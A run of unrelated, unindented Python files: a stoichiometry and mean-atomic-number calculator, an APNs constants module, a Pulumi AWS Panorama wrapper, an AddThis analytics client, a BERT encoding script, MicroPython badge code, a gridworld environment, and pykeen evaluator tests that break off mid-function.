print(f'Manuca comes without any warranty for correctness. PLEASE double-check the outputs and if the input stoichiometry is read in correctly.')
while True:
user_input = input("Enter stoichiometry: ")
if(user_input == 'q'):
break
if(user_input == 'help'):
printHelp()
continue
if(user_input == 'multi'):
n_comp = int(input("Enter number of compounds: "))
multicompound = multi_compound(n_comp)
# Dictionary from chemparse with values
if(user_input == 'multi'):
parse = multicompound
else:
parse = user_input
### Calculations
d = chemparse.parse_formula(parse)
e = list(d.keys()) #elements
w = np.array(list(d.values())) #weights
try:
m = element(e) #Element properties from mendeleev
except:
print('At least one element could not be recognized. Please check stoichiometry and try again.')
continue
### Atomic percentages
n = np.sum(w)
d_atp = {k: v / n for k, v in d.items()}
### Weight percentages
aw = np.array([element.atomic_weight for element in m])
n_weight = np.sum(w/n*aw)
d_wtp = {k: v/n*aw[i]/n_weight for i, (k, v) in enumerate(d.items())}
### Mean atomic numbers
decimals = 3
Z = np.array([element.atomic_number for element in m])
Wtpercents = np.fromiter(d_wtp.values(), dtype='float')
Atpercents = np.fromiter(d_atp.values(), dtype='float')
meanZ_Average = np.round(np.sum(w/n*Z), decimals) #Simple average based on atomic proportions
meanZ_Mueller = np.round(np.sum(Z*Wtpercents), decimals) #Mueller 1954
meanZ_SaldickAllen = np.round(np.sum(Atpercents*Z**2)/np.sum(Atpercents*Z), decimals) #Saldick and Allen 1954
meanZ_Joyet = np.round(np.sqrt(np.sum(Atpercents*Z**2)), decimals) #Joyet 1953, Hohn und Niedrig 1972, Büchner 1973
meanZ_Everhart = np.round(np.sum(Wtpercents*Z**2)/np.sum(Wtpercents*Z), decimals) #Everhart 1960, Joy 1995
### Effective atomic number
Zeff_Egerton = np.round(np.sum(Atpercents*Z**1.3)/np.sum(Atpercents*Z**0.3), decimals) #effective Z, Egerton for EFTEM
Aeff_Egerton = np.round(np.sum(Atpercents*aw**1.3)/np.sum(Atpercents*aw**0.3), decimals) #effective A, Egerton for EFTEM
### Atomic mass
tot_atomic_mass = np.round(np.sum(w*aw), decimals)
avg_atomic_mass = np.round(np.sum(w/n*aw), decimals)
#Print results
print('Chemical formula:')
print(chemparse.parse_formula(parse))
print('------------------------------')
print('Element\t at.%\t','wt.%')
for key, value in d_atp.items():
print(key,'\t', np.round(value*100,2),'\t',np.round(d_wtp[key]*100,2))
print('------------------------------')
print('Mean atomic numbers:')
print('------------------------------')
print(f'Atomic-percent average:\t{meanZ_Average}')
print(f'Mueller (1954):\t\t{meanZ_Mueller}')
print(f'Saldick & Allen (1954):\t{meanZ_SaldickAllen}')
print(f'Joyet (1953):\t\t{meanZ_Joyet}')
print(f'Everhart (1960):\t{meanZ_Everhart}')
print('------------------------------')
print('Other properties:')
print('------------------------------')
print(f'Zeff (Egerton, EFTEM):\t{Zeff_Egerton}')
print(f'Aeff (EFTEM, g/mol):\t{Aeff_Egerton}')
print(f'Tot. A (g/mol):\t\t{tot_atomic_mass}')
print(f'Avg. A (g/mol):\t\t{avg_atomic_mass}')
print('==============================\n')
|
"""Definition of command codes used in communication with APNs."""
NOTIFICATION = 2
ERROR_RESPONSE = 8
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
__all__ = [
'GetPackageResult',
'AwaitableGetPackageResult',
'get_package',
'get_package_output',
]
@pulumi.output_type
class GetPackageResult:
def __init__(__self__, arn=None, created_time=None, package_id=None, storage_location=None, tags=None):
if arn and not isinstance(arn, str):
raise TypeError("Expected argument 'arn' to be a str")
pulumi.set(__self__, "arn", arn)
if created_time and not isinstance(created_time, int):
raise TypeError("Expected argument 'created_time' to be a int")
pulumi.set(__self__, "created_time", created_time)
if package_id and not isinstance(package_id, str):
raise TypeError("Expected argument 'package_id' to be a str")
pulumi.set(__self__, "package_id", package_id)
if storage_location and not isinstance(storage_location, dict):
raise TypeError("Expected argument 'storage_location' to be a dict")
pulumi.set(__self__, "storage_location", storage_location)
if tags and not isinstance(tags, list):
raise TypeError("Expected argument 'tags' to be a list")
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter
def arn(self) -> Optional[str]:
return pulumi.get(self, "arn")
@property
@pulumi.getter(name="createdTime")
def created_time(self) -> Optional[int]:
return pulumi.get(self, "created_time")
@property
@pulumi.getter(name="packageId")
def package_id(self) -> Optional[str]:
return pulumi.get(self, "package_id")
@property
@pulumi.getter(name="storageLocation")
def storage_location(self) -> Optional['outputs.PackageStorageLocation']:
return pulumi.get(self, "storage_location")
@property
@pulumi.getter
def tags(self) -> Optional[Sequence['outputs.PackageTag']]:
return pulumi.get(self, "tags")
class AwaitableGetPackageResult(GetPackageResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetPackageResult(
arn=self.arn,
created_time=self.created_time,
package_id=self.package_id,
storage_location=self.storage_location,
tags=self.tags)
def get_package(package_id: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetPackageResult:
"""
Schema for Package CloudFormation Resource
"""
__args__ = dict()
__args__['packageId'] = package_id
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('aws-native:panorama:getPackage', __args__, opts=opts, typ=GetPackageResult).value
return AwaitableGetPackageResult(
arn=__ret__.arn,
created_time=__ret__.created_time,
package_id=__ret__.package_id,
storage_location=__ret__.storage_location,
tags=__ret__.tags)
@_utilities.lift_output_func(get_package)
def get_package_output(package_id: Optional[pulumi.Input[str]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetPackageResult]:
"""
Schema for Package CloudFormation Resource
"""
...
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
import requests
from addthis.exceptions import AddthisError, AddthisValidationError
class Addthis(object):
"""Base class that keeps authentication parameters and instantiates
an ``AddthisEndpoint`` object.
"""
def __init__(self, userid, password, pubid=None):
""" ``userid``
Your AddThis userid or email address.
``password``
Your AddThis password.
``pubid``
The publisher profile for which you are requesting data. If
you specify it in constructor it will be used in all requests.
Alternatively you can pass it as a parameter for the each
request.
"""
self.userid = userid
self.password = password
self.pubid = pubid
def __getattr__(self, path):
"""Returns a callable ``AddthisEndpoint`` object that will execute
the query.
"""
return AddthisEndpoint(self.userid, self.password, self.pubid, path)
class AddthisEndpoint(object):
"""Actual object that executes queries to the Addthis Analytics API."""
API_VERSION = 1.0
BASE_URL = "https://api.addthis.com/analytics/{api_version}/pub/"\
.format(api_version=API_VERSION)
def __init__(self, userid, password, pubid, path=None):
self.userid = userid
self.password = password
self.pubid = pubid
self.path = []
if path:
self.path.append(path)
def __getattr__(self, path):
self.path.append(path)
return self
def __call__(self, *args, **kwargs):
"""Checks that there are 2 parameters in the ``path`` list:
the first one is ``metric`` and the second one is ``dimension``
Raises an Exception if the number of parameters is different.
"""
if len(self.path) != 2:
raise AddthisValidationError("Incorrect number of parameters "
"are given. Expected 2 but got "
"{num_params}."
.format(num_params=len(self.path)))
metric = self.path[0]
dimension = self.path[1]
return self.request(metric, dimension, query_params=kwargs)
def _make_request_url(self, metric, dimension):
return "{0}{1}/{2}.json".format(self.BASE_URL, metric, dimension)
def _make_query_params(self, query_params):
if query_params is None:
query_params = {}
if "pubid" not in query_params and self.pubid:
query_params["pubid"] = self.pubid
return query_params
def _make_request(self, url, query_params):
return requests.get(url, params=query_params, auth=(self.userid,
self.password))
def request(self, metric, dimension, query_params=None):
"""Given metric, dimension and query parameters constructs the url
and executes the query. If response status code is not 200 raises an
Exception populated with data returned from Addthis. Returns
a dictionary with data if request was successful.
"""
url = self._make_request_url(metric, dimension)
query_params = self._make_query_params(query_params)
response = self._make_request(url, query_params)
data = response.json()
if response.status_code != 200:
raise AddthisError(response.status_code, data["error"])
return data |
# Please run bert-serving-start before running this notebook
# Setup: https://github.com/hanxiao/bert-as-service
# Examples (change folders to your locals)
# english cased: bert-serving-start -model_dir /bert-as-service/cased_L-24_H-1024_A-16/ -num_worker=4
# multi cased: bert-serving-start -model_dir /bert-as-service/multi_cased_L-12_H-768_A-12/ -num_worker=4
# chinese: bert-serving-start -model_dir /bert-as-service/chinese_L-12_H-768_A-12/ -num_worker=4
# launch bert (valilenk):
# english cased: bert-serving-start -model_dir /media/airvetra/1tb/valilenk/nlp/bert-as-service/cased_L-24_H-1024_A-16/ -num_worker=2
# multi cased: bert-serving-start -model_dir /media/airvetra/1tb/valilenk/nlp/bert-as-service/multi_cased_L-12_H-768_A-12/ -num_worker=2
# chinese: bert-serving-start -model_dir /media/airvetra/1tb/valilenk/nlp/bert-as-service/chinese_L-12_H-768_A-12/ -num_worker=2
import pandas as pd
import torch
import os
from time import time
from tqdm import tqdm
from bert_serving.client import BertClient
data_folder = os.path.dirname(os.getcwd()) + "/data"
test = pd.read_csv(data_folder + "/raw/test.csv")
bc = BertClient()
def gen_encodings(df, column):
t0 = time()
_list = list(df.loc[:, column])
for i, text in enumerate(_list):
if not isinstance(_list[i], str):
_list[i] = str(text)
if not _list[i].strip():
_list[i] = _list[i].strip()
if len(_list[i]) == 0:
_list[i] = "temp"
arr = bc.encode(_list)
temp = pd.DataFrame(arr)
temp.columns = [f"{column}_{c}" for c in range(len(arr[0]))]
temp = temp.join(df.id)
print(f"time: {time() - t0}")
return temp
encoded_test = gen_encodings(test, "title1_en")
encoded_test.to_csv("encoded_test1.csv")
encoded_test = gen_encodings(test, "title2_en")
encoded_test.to_csv("encoded_test2.csv")
|
from machine import Pin, I2C
from neopixel import NeoPixel
from time import sleep, ticks_ms, ticks_diff
import framebuf
import gc
import sh1106
# Wemos pins - for our and our users' convenience
D0 = const(16)
D1 = const(5)
D2 = const(4)
D3 = const(0)
D4 = const(2)
D5 = const(14)
D6 = const(12)
D7 = const(13)
D8 = const(15)
# I2C and screen
i2c = I2C(scl=Pin(D1), sda=Pin(D2), freq=400000) # I2C object on pins D1 an dD2
lcd = sh1106.SH1106_I2C(128, 64, i2c, None, 0x3c, rotate=180) # SH1106 display on I2C 0x3C, rotated
# screen init
lcd.sleep(False) # Turn on the display
lcd.fill(0) # Erase display
# Neopixel
numPixels = 1 # How many pixels are attached to the nugget? If just the built in display, put 1
pin = Pin(D8, Pin.OUT) # set GPIO15 to output to drive NeoPixels
def get_neopixels(count):
return NeoPixel(pin, count) # create NeoPixel driver on GPIO15 for all neopixels
# Button pins
down_p = Pin(D3, Pin.IN, Pin.PULL_UP) # down is green
up_p = Pin(D6, Pin.IN, Pin.PULL_UP) # up is red
left_p = Pin(D7, Pin.IN, Pin.PULL_UP) # left is blue
right_p = Pin(D5, Pin.IN, Pin.PULL_UP) # right is yellow
# Button wrapper code for usability
class Buttons():
debounce_time = 150 # milliseconds
def __init__(self, buttons, callbacks={}, aliases={}):
self.b = buttons
self.cb = callbacks
self.b_al = aliases
self.values = {name:False for name in buttons}
self.debounce = {name:0 for name in buttons}
def update(self):
for name, button in self.b.items():
new = not button.value() # inverting the pin here
old = self.values[name]
if new and not old:
# button just pressed, recording that
self.values[name] = True
# clearing debounce timer if it's set - we only debounce on release
self.debounce[name] = None
# executing the button callback if available
cb = self.cb.get(name, None)
if callable(cb):
cb()
elif old and not new:
# button is released
# we debounce only button release
# this is so that button presses are processed quicker
if not self.debounce[name]:
# starting debounce timer
self.debounce[name] = ticks_ms()
else:
if ticks_diff(ticks_ms(), self.debounce[name]) > self.debounce_time:
# button has been de-pressed for long enough
# accepting and moving on
self.values[name] = False
elif new:
# button still pressed
# just removing the debounce timer
# in case it's been activated by a bit of bounce on press
self.debounce[name] = None
else:
pass # button long-released
def __getattr__(self, attr):
# lets you get button value by direction - like `buttons.left`
if attr in self.b:
# return value
return self.values[attr]
# lets you get button value by color - like `buttons.blue`
elif attr in self.b_al:
return self.values[self.b_al[attr]]
buttons = Buttons({"down":down_p, "up":up_p, "left":left_p, "right":right_p} ,
aliases={"red":"up", "blue":"left", "yellow":"red", "green":"down"})
# Screen image decompression
def unpack(packed_data):
"""
Decompresses image data using a very simple algorithm described in 'pack'.
Returns a bytearray.
"""
i = 0 # index for the unpacked bytearray element that we're currently on
# checking the compression format version, for future compatibility in case this algo changes significantly
if packed_data[0] != 1:
print("Don't know how to decompress this image, format version:", packed_data[0])
return None
# pre-creating a bytearray of the length we need, initially filled with zeroes
# to avoid creating too many useless objects and wasting memory as we unpack
unpacked_data = bytearray(packed_data[1])
for element in packed_data[2:]: # need to skip two elements - version and length
if isinstance(element, int): # just an int, simply putting it into the bytearray
unpacked_data[i] = element
i += 1
else:
value, count = element
if value == 0: # small optimization
# skipping zero-filling since bytearrays are pre-filled with zeroes
i += count
else:
for _ in range(count):
unpacked_data[i] = value
i += 1
return unpacked_data
# Showing compressed images
def show_compressed(packed_data, fb_width=124, fb_height=64):
data = unpack(packed_data)
fb = framebuf.FrameBuffer(data, fb_width, fb_height, framebuf.MONO_VLSB)
lcd.fill(0)
lcd.blit(fb, 0, 0)
lcd.show()
del data
del fb
gc.collect()
cutie_c = [1, 992, [0, 253], 192, [224, 2], 112, 56, 60, [28, 2], [14, 9], [28, 2], 56, 120, 240, 224, 192, 128, [0, 63], 192, 224, 240, 120, 60, 28, [14, 3], [7, 7], 6, [14, 2], 28, 60, 56, 240, 224, 192, 128, [0, 7], 240, 252, 255, 7, 1, [0, 11], 32, [248, 2], [252, 2], 248, 112, [0, 2], 1, 3, 31, 254, 248, 128, [0, 57], 224, 252, 255, 7, 1, [0, 12], 120, [252, 4], 120, [0, 3], 1, 7, 255, 254, 240, [0, 5], 15, 127, 255, 224, 128, [0, 13], [1, 3], [0, 5], 192, 240, 255, 63, 1, [0, 26], 112, [248, 7], 112, [0, 22], 3, 31, 127, 240, 192, 128, [0, 19], 128, 192, 240, 255, 63, 7, [0, 7], 1, 3, 7, 15, 30, 60, 56, 48, [112, 2], [96, 2], [224, 3], 96, [112, 3], [56, 2], 28, 14, 15, 7, 1, [0, 21], 24, 120, 240, 192, 128, [0, 5], 1, 3, 255, 3, 1, [0, 5], 128, 192, 240, 120, 24, [0, 17], 1, 3, 7, 15, 30, 28, [56, 3], [112, 7], 48, [56, 2], 28, 30, 14, 7, 3, 1, [0, 60], 1, 3, 7, 6, 14, [12, 4], 15, 12, 8, [12, 2], [6, 2], [3, 2], 1, [0, 175]]
dead_c = [1, 992, [0, 137], 1, 3, 15, 31, 127, 255, 254, 248, 240, 192, 128, [0, 4], 128, 192, 240, 252, 254, 255, 63, 31, 7, 3, [0, 50], 1, 3, 15, 31, 127, 255, 254, 248, 240, 192, 128, [0, 4], 128, 192, 240, 252, 254, 255, 63, 31, 7, 3, [0, 30], 3, 7, 31, 191, 255, 254, [248, 2], 254, 255, 31, 15, 7, 1, [0, 61], 3, 7, 31, 191, 255, 254, [248, 2], 254, 255, 31, 15, 7, 1, [0, 33], 128, 224, 240, 252, 254, 127, 31, 15, 3, 7, 31, 127, 255, 254, 248, 240, 192, 128, [0, 57], 128, 224, 240, 252, 254, 127, 31, 15, 3, 7, 31, 127, 255, 254, 248, 240, 192, 128, [0, 27], 32, 56, 60, [63, 3], 15, 3, 1, [0, 8], 3, 15, 31, [63, 2], 62, 60, 48, 32, [0, 20], 112, [248, 7], 112, [0, 20], 32, 56, 60, [63, 3], 15, 3, 1, [0, 8], 3, 15, 31, [63, 2], 62, 60, 48, 32, [0, 61], 24, 120, 240, 192, 128, [0, 5], 1, 3, 255, 3, 1, [0, 5], 128, 192, 240, 120, 24, [0, 102], 1, 3, 7, 6, 14, [12, 4], 15, 12, 8, [12, 2], [6, 2], [3, 2], 1, [0, 175]]
nyaa_c = [1, 992, [0, 270], 128, 224, [248, 3], 224, 192, [0, 68], 128, 224, [248, 3], 224, 192, [0, 37], 128, 224, 240, 252, 254, 127, 31, 15, 3, 7, 31, 127, 255, 254, 248, 240, 192, 128, [0, 57], 128, 224, 240, 252, 254, 127, 31, 15, 3, 7, 31, 127, 255, 254, 248, 240, 192, 128, [0, 27], 32, 56, 60, [63, 3], 15, 3, 1, [0, 8], 3, 15, 31, [63, 2], 62, 60, 48, 32, [0, 20], 112, [248, 7], 112, [0, 20], 32, 56, 60, [63, 3], 15, 3, 1, [0, 8], 3, 15, 31, [63, 2], 62, 60, 48, 32, [0, 61], 24, 120, 240, 192, 128, [0, 5], 1, 3, 255, 3, 1, [0, 5], 128, 192, 240, 120, 24, [0, 102], 1, 3, 7, 6, 14, [12, 4], 15, 12, 8, [12, 2], [6, 2], [3, 2], 1, [0, 175]]
|
# https://deeplearningcourses.com/c/artificial-intelligence-reinforcement-learning-in-python
# https://www.udemy.com/artificial-intelligence-reinforcement-learning-in-python
#from __future__ import print_function, division
#from builtins import range
# Note: you may need to update your version of future
# sudo pip install -U future
import numpy as np
import random
#====================== Grid Class definition ==================
class Grid: # Environment
def __init__(self, width, height, start):
self.width = width
self.height = height
self.i = start[0]
self.j = start[1]
def set(self, rewards, actions):
# rewards should be a dict of: (i, j): r (row, col): reward
# actions should be a dict of: (i, j): A (row, col): list of possible actions
self.rewards = rewards
self.actions = actions
def set_state(self, s):
self.i = s[0]
self.j = s[1]
def current_state(self):
return (self.i, self.j)
def is_terminal(self, s):
return s not in self.actions
def move(self, action):
# check if legal move first
if action in self.actions[(self.i, self.j)]:
if action == 'U':
self.i -= 1
elif action == 'D':
self.i += 1
elif action == 'R':
self.j += 1
elif action == 'L':
self.j -= 1
# return a reward (if any)
return self.rewards.get((self.i, self.j), 0)
def undo_move(self, action):
# these are the opposite of what U/D/L/R should normally do
if action == 'U':
self.i += 1
elif action == 'D':
self.i -= 1
elif action == 'R':
self.j -= 1
elif action == 'L':
self.j += 1
# raise an exception if we arrive somewhere we shouldn't be
# should never happen
assert(self.current_state() in self.all_states())
def game_over(self):
# returns true if game is over, else false
# true if we are in a state where no actions are possible
return (self.i, self.j) not in self.actions
def all_states(self):
# possibly buggy but simple way to get all states
# either a position that has possible next actions
# or a position that yields a reward
return set(self.actions.keys()) | set(self.rewards.keys())
#======================================= fucntions =======================
def standard_grid():
# define a grid that describes the reward for arriving at each state
# and possible actions at each state
# the grid looks like this
# x means you can't go there
# s means start position
# number means reward at that state
# . . . 1
# . x . -1
# s . . .
g = Grid(3, 4, (2, 0))
rewards = {(0, 3): 1, (1, 3): -1}
actions = {
(0, 0): ('D', 'R'),
(0, 1): ('L', 'R'),
(0, 2): ('L', 'D', 'R'),
(1, 0): ('U', 'D'),
(1, 2): ('U', 'D', 'R'),
(2, 0): ('U', 'R'),
(2, 1): ('L', 'R'),
(2, 2): ('L', 'R', 'U'),
(2, 3): ('L', 'U'),
}
g.set(rewards, actions)
return g
def negative_grid(step_cost=-0.1):
# in this game we want to try to minimize the number of moves
# so we will penalize every move
g = standard_grid()
g.rewards.update({
(0, 0): step_cost,
(0, 1): step_cost,
(0, 2): step_cost,
(1, 0): step_cost,
(1, 2): step_cost,
(2, 0): step_cost,
(2, 1): step_cost,
(2, 2): step_cost,
(2, 3): step_cost,
})
return g
#print random action
def list_random_action(gg):
for i in range(gg.width):
print("---------------------------")
for j in range(gg.height):
a = gg.actions.get((i,j), ' ')
print(" %s |" % random.choice(a), end="")
print("")
def print_values(V, g):
for i in range(g.width):
print("---------------------------")
for j in range(g.height):
v = V.get((i,j), 0)
if v >= 0:
print(" %.2f|" % v, end="")
else:
print("%.2f|" % v, end="") # -ve sign takes up an extra space
print("")
def print_policy(P, g):
for i in range(g.width):
print("---------------------------")
for j in range(g.height):
a = P.get((i,j), ' ')
print(" %s |" % a, end="")
print("")
if __name__ == "__main__":
grid = Grid(3, 4, (2, 0))
rewards = {(0, 3): 1, (1, 3): -1}
actions = {
(0, 0): ('D', 'R'),
(0, 1): ('L', 'R'),
(0, 2): ('L', 'D', 'R'),
(1, 0): ('U', 'D'),
(1, 2): ('U', 'D', 'R'),
(2, 0): ('U', 'R'),
(2, 1): ('L', 'R'),
(2, 2): ('L', 'R', 'U'),
(2, 3): ('L', 'U'), }
grid.set(rewards, actions)
print('rewards=',grid.rewards)
print('actions=',grid.actions)
|
# -*- coding: utf-8 -*-
"""Test the evaluators."""
import dataclasses
import logging
import unittest
from typing import Any, ClassVar, Dict, Mapping, Optional, Tuple, Type
import torch
from pykeen.datasets import Nations
from pykeen.evaluation import Evaluator, MetricResults, RankBasedEvaluator, RankBasedMetricResults
from pykeen.evaluation.evaluator import create_dense_positive_mask_, create_sparse_positive_filter_, filter_scores_
from pykeen.evaluation.rank_based_evaluator import RANK_TYPES, SIDES, compute_rank_from_scores
from pykeen.evaluation.sklearn import SklearnEvaluator, SklearnMetricResults
from pykeen.models import TransE
from pykeen.models.base import EntityRelationEmbeddingModel, Model
from pykeen.triples import TriplesFactory
from pykeen.typing import MappedTriples
logger = logging.getLogger(__name__)
class _AbstractEvaluatorTests:
"""A test case for quickly defining common tests for evaluators models."""
# The triples factory and model
factory: TriplesFactory
model: Model
#: The evaluator to be tested
evaluator_cls: ClassVar[Type[Evaluator]]
evaluator_kwargs: ClassVar[Optional[Mapping[str, Any]]] = None
# Settings
batch_size: int
embedding_dim: int
#: The evaluator instantiation
evaluator: Evaluator
def setUp(self) -> None:
"""Set up the test case."""
# Settings
self.batch_size = 8
self.embedding_dim = 7
# Initialize evaluator
self.evaluator = self.evaluator_cls(**(self.evaluator_kwargs or {}))
# Use small test dataset
self.factory = Nations().training
# Use small model (untrained)
self.model = TransE(triples_factory=self.factory, embedding_dim=self.embedding_dim)
def _get_input(
self,
inverse: bool = False,
) -> Tuple[torch.LongTensor, torch.FloatTensor, Optional[torch.BoolTensor]]:
# Get batch
hrt_batch = self.factory.mapped_triples[:self.batch_size].to(self.model.device)
# Compute scores
if inverse:
scores = self.model.score_h(rt_batch=hrt_batch[:, 1:])
else:
scores = self.model.score_t(hr_batch=hrt_batch[:, :2])
# Compute mask only if required
if self.evaluator.requires_positive_mask:
# TODO: Re-use filtering code
triples = self.factory.mapped_triples
if inverse:
sel_col, start_col = 0, 1
else:
sel_col, start_col = 2, 0
stop_col = start_col + 2
# shape: (batch_size, num_triples)
triple_mask = (triples[None, :, start_col:stop_col] == hrt_batch[:, None, start_col:stop_col]).all(dim=-1)
batch_indices, triple_indices = triple_mask.nonzero(as_tuple=True)
entity_indices = triples[triple_indices, sel_col]
# shape: (batch_size, num_entities)
mask = torch.zeros_like(scores, dtype=torch.bool)
mask[batch_indices, entity_indices] = True
else:
mask = None
return hrt_batch, scores, mask
def test_process_tail_scores_(self) -> None:
"""Test the evaluator's ``process_tail_scores_()`` function."""
hrt_batch, scores, mask = self._get_input()
true_scores = scores[torch.arange(0, hrt_batch.shape[0]), hrt_batch[:, 2]][:, None]
self.evaluator.process_tail_scores_(
hrt_batch=hrt_batch,
true_scores=true_scores,
scores=scores,
dense_positive_mask=mask,
)
def test_process_head_scores_(self) -> None:
"""Test the evaluator's ``process_head_scores_()`` function."""
hrt_batch, scores, mask = self._get_input(inverse=True)
true_scores = scores[torch.arange(0, hrt_batch.shape[0]), hrt_batch[:, 0]][:, None]
self.evaluator.process_head_scores_(
hrt_batch=hrt_batch,
true_scores=true_scores,
scores=scores,
dense_positive_mask=mask,
)
def test_finalize(self) -> None:
# Process one batch
hrt_batch, scores, mask = self._get_input()
true_scores = scores[torch.arange(0, hrt_batch.shape[0]), hrt_batch[:, 2]][:, None]
self.evaluator.process_tail_scores_(
hrt_batch=hrt_batch,
true_scores=true_scores,
scores=scores,
dense_positive_mask=mask,
)
result = self.evaluator.finalize()
assert isinstance(result, MetricResults)
self._validate_result(
result=result,
data={'batch': hrt_batch, 'scores': scores, 'mask': mask},
)
def _validate_result(
self,
result: MetricResults,
data: Dict[str, torch.Tensor],
):
logger.warning(f'{self.__class__.__name__} did not overwrite _validate_result.')
class RankBasedEvaluatorTests(_AbstractEvaluatorTests, unittest.TestCase):
"""unittest for the RankBasedEvaluator."""
evaluator_cls = RankBasedEvaluator
def _validate_result(
self,
result: MetricResults,
data: Dict[str, torch.Tensor],
):
# Check for correct class
assert isinstance(result, RankBasedMetricResults)
# Check value ranges
for side, all_type_mr in result.mean_rank.items():
assert side in SIDES
for rank_type, mr in all_type_mr.items():
assert rank_type in RANK_TYPES
assert isinstance(mr, float)
assert 1 <= mr <= self.factory.num_entities
for side, all_type_mrr in result.mean_reciprocal_rank.items():
assert side in SIDES
for rank_type, mrr in all_type_mrr.items():
assert rank_type in RANK_TYPES
assert isinstance(mrr, float)
assert 0 < mrr <= 1
for side, all_type_hits_at_k in result.hits_at_k.items():
assert side in SIDES
for rank_type, hits_at_k in all_type_hits_at_k.items():
assert rank_type in RANK_TYPES
for k, h in hits_at_k.items():
assert isinstance(k, int)
assert 0 < k < self.factory.num_entities
assert isinstance(h, float)
assert 0 <= h <= 1
# TODO: Validate with data?
class SklearnEvaluatorTest(_AbstractEvaluatorTests, unittest.TestCase):
"""Unittest for the SklearnEvaluator."""
evaluator_cls = SklearnEvaluator
def _validate_result(
self,
result: MetricResults,
data: Dict[str, torch.Tensor],
):
# Check for correct class
assert isinstance(result, SklearnMetricResults)
# check value
scores = data['scores'].detach().numpy()
mask = data['mask'].detach().float().numpy()
# filtering
uniq = dict()
batch = data['batch'].detach().numpy()
for i, (h, r) in enumerate(batch[:, :2]):
uniq[int(h), int(r)] = i
indices = sorted(uniq.values())
mask = mask[indices]
scores = scores[indices]
for field in dataclasses.fields(SklearnMetricResults):
f = field.metadata['f']
exp_score = f(mask.flat, scores.flat)
self.assertAlmostEqual(result.get_metric(field.name), exp_score)
class EvaluatorUtilsTests(unittest.TestCase):
"""Test the utility functions used by evaluators."""
def setUp(self) -> None:
"""Set up the test case with a fixed random seed."""
self.generator = torch.random.manual_seed(seed=42)
def test_compute_rank_from_scores(self):
"""Test the _compute_rank_from_scores() function."""
batch_size = 3
all_scores = torch.tensor([
[2., 2., 1., 3., 5.],
[1., 1., 3., 4., 0.],
[1., 1., 3., float('nan'), 0],
])
# true_score: (2, 3, 3)
true_score = torch.tensor([2., 3., 3.]).view(batch_size, 1)
exp_best_rank = torch.tensor([3., 2., 1.])
exp_worst_rank = torch.tensor([4., 2., 1.])
exp_avg_rank = 0.5 * (exp_best_rank + exp_worst_rank)
exp_adj_rank = exp_avg_rank / torch.tensor([(5 + 1) / 2, (5 + 1) / 2, (4 + 1) / 2])
ranks = compute_rank_from_scores(true_score=true_score, all_scores=all_scores)
best_rank = ranks.get('best')
assert best_rank.shape == (batch_size,)
assert (best_rank == exp_best_rank).all()
worst_rank = ranks.get('worst')
assert worst_rank.shape == (batch_size,)
assert (worst_rank == exp_worst_rank).all()
avg_rank = ranks.get('avg')
assert avg_rank.shape == (batch_size,)
assert (avg_rank == exp_avg_rank).all(), (avg_rank, exp_avg_rank)
adj_rank = ranks.get('adj')
assert adj_rank.shape == (batch_size,)
assert (adj_rank == exp_adj_rank).all(), (adj_rank, exp_adj_rank)
def test_create_sparse_positive_filter_(self):
"""Test method create_sparse_positive_filter_."""
batch_size = 4
factory = Nations().training
all_triples = factory.mapped_triples
batch = all_triples[:batch_size, :]
# head based filter
sparse_positives, relation_filter = create_sparse_positive_filter_(
hrt_batch=batch,
all_pos_triples=all_triples,
relation_filter=None,
filter_col=0,
)
# preprocessing for faster lookup
triples = set()
for trip in all_triples.detach().numpy():
triples.add(tuple(map(int, trip)))
# check that all found positives are positive
for batch_id, entity_id in sparse_positives:
same = batch[batch_id, 1:]
assert (int(entity_id),) + tuple(map(int, same)) in triples
def test_create_dense_positive_mask_(self):
"""Test method create_dense_positive_mask_."""
batch_size = 3
num_positives = 5
num_entities = 7
zero_tensor = torch.zeros(batch_size, num_entities)
filter_batch = torch.empty(num_positives, 2, dtype=torch.long)
for i in range(num_positives):
filter_batch[i, 0] = i % batch_size
filter_batch[:, 1] = torch.randperm(num_positives, generator=self.generator)
dense_mask = create_dense_positive_mask_(zero_tensor=zero_tensor, filter_batch=filter_batch)
# check in-place
assert id(dense_mask) == id(zero_tensor)
for b in range(batch_size):
for e in range(num_entities):
if (torch.as_tensor([b, e]).view(1, 2) == filter_batch).all(dim=1).any():
assert dense_mask[b, e] == 1
else:
assert dense_mask[b, e] == 0
def test_filter_corrupted_triples(self):
"""Test the filter_corrupted_triples() function."""
batch_size = 2
num_entities = 4
all_pos_triples = torch.tensor(
[
[0, 1, 2],
[1, 2, 3],
[1, 3, 3],
[3, 4, 1],
[0, 2, 2],
[3, 1, 2],
[1, 2, 0],
], dtype=torch.long,
)
batch = torch.tensor(
[
[0, 1, 2],
[1, 2, 3],
], dtype=torch.long,
)
head_filter_mask = torch.tensor(
[
[True, False, False, False],
[False, True, False, False],
], dtype=torch.bool,
)
tail_filter_mask = torch.tensor(
[
[False, False, True, False],
[False, False, False, True],
], dtype=torch.bool,
)
exp_head_filter_mask = torch.tensor(
[
[True, False, False, True],
[False, True, False, False],
], dtype=torch.bool,
)
exp_tail_filter_mask = torch.tensor(
[
[False, False, True, False],
[True, False, False, True],
], dtype=torch.bool,
)
assert batch.shape == (batch_size, 3)
assert head_filter_mask.shape == (batch_size, num_entities)
assert tail_filter_mask.shape == (batch_size, num_entities)
# Test head scores
head_scores = torch.randn(batch_size, num_entities, generator=self.generator)
old_head_scores = head_scores.detach().clone()
positive_filter_heads, relation_filter = create_sparse_positive_filter_(
hrt_batch=batch,
all_pos_triples=all_pos_triples,
relation_filter=None,
filter_col=0,
)
filtered_head_scores = filter_scores_(
scores=head_scores,
filter_batch=positive_filter_heads,
)
# Assert in-place modification
mask = torch.isfinite(head_scores)
assert (head_scores[mask] == filtered_head_scores[mask]).all()
assert not torch.isfinite(filtered_head_scores[~mask]).any()
# Assert correct filtering
